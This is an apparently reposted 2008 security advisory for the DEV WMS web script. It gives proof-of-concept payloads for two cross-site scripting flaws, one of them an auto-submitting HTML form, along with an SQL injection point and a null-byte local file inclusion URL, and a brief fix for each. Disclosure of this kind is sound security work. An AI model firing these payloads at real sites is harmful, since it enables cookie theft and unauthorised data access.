DEV WMS Multiple Vulnerabilities

2008.07.31
Credit: irancrash_at_gmail.com
Risk: High
Local: No
Remote: No
CVE: N/A
CWE: N/A

---------------------------------------------------------------- Script : DEV WMS Type : Multiple Vulnerabilities ( Local file inclusion / Cross Site Scripting / SQL Injection ) Alert : High ---------------------------------------------------------------- Discovered by : Khashayar Fereidani Or Dr.Crash My Website : http://FEREIDANI.IR Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com ---------------------------------------------------------------- Script Download : http://dev-wms.sourceforge.net/ ---------------------------------------------------------------- XSS Vulnerability 1 : Variable Sent Method : GET Vulnerable Variable : session Address : http://Example.com/?session=">><>><script>alert(document.cookie)</script> Solution : filter session variable with htmlspecialchars() function ... ---------------------------------------------------------------- Xss Vulnerability 2 : Variable Sent Method : POST Vulnerable Variable : kluc Address : http://Example.com/index.php?session=0&action=search change example.com to script address in a real site and save as ircrash.html , open file with browser and see your cookie . <html> <head></head> <body onLoad=javascript:document.form.submit()> <form action="http://Example.com/index.php?session=0&action=search" method="POST" name="form"> <form method="post" onSubmit="return validateprm(this)"><input type="hidden" name="prip" value="true"/><input type="hidden" name="action" value="search"/> <input type="hidden" name="kluc" value="&#34&#39&#39&#39&#60&#62&#62&#62&#62<script>alert('xss')</script>"> </form> </body> </html> Solution : filter kluc variable with htmlspecialchars() function ... ---------------------------------------------------------------- SQL Injection : Method Of Send : GET Vulnerable Variable : article Address : http://Example.com/index.php?session=0&action=read&click=open&article=[SQL CODE] Solution : Filter danger caracter for article variable ... ---------------------------------------------------------------- Local file inclusion : Method Of Send : GET Vulnerable Variable : step Address : http://Example.com/admin/index.php?start=install&step=file.type%00 Solution : Filter step variable with if function ... ---------------------------------------------------------------- Tnx : God http://IRCRASH.COM ----------------------------------------------------------------

References:

http://seclists.org/bugtraq/2008/Jul/0288.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top